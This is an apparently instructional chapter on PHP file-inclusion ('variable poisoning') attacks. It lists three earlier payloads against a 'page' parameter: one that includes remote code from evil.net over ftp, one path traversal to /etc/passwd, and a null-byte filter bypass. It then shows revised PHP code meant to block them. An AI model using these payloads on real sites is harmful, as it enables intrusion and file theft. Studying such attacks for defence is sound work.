Variable Poisoning :: Chapter 4

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
  3. ./?page=....//....//....//....//....//....//....//etc/passwd%00.php
New Code:
  <?php
  // php.ini :: allow_url_fopen = Off
  // Only accept page names that end in ".php" (case-insensitive).
  if (!preg_match ('/\.php$/i', $_GET['page'])) {
      die ('Invalid request.');
  }
  $include_file = $_GET['page'];
  // Strip every "../" sequence, repeating until none remain.
  while (stristr ($include_file, '../')) {
      $include_file = str_replace ('../', '', $include_file);
  }
  $path = '/path/to/file/';
  // Include the requested file from the page directory if it exists.
  if (file_exists ($path . $include_file)) {
      include $path . $include_file;
  }